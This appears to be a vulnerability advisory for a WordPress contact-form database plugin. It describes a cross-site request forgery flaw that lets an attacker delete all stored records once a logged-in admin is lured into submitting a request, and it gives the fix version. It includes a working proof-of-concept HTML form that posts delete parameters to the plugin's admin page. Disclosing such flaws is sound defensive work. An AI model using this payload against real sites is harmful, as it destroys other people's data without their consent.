CVSS Summary
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Last revised:
An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.
Current state: Fixed
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript).
<form action="http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions" method="post"> <input name="all" type="text" value="y"> <input name="delete" type="text" value="y"> <input type="submit"> </form>
Upgrade to version 2.8.32 or later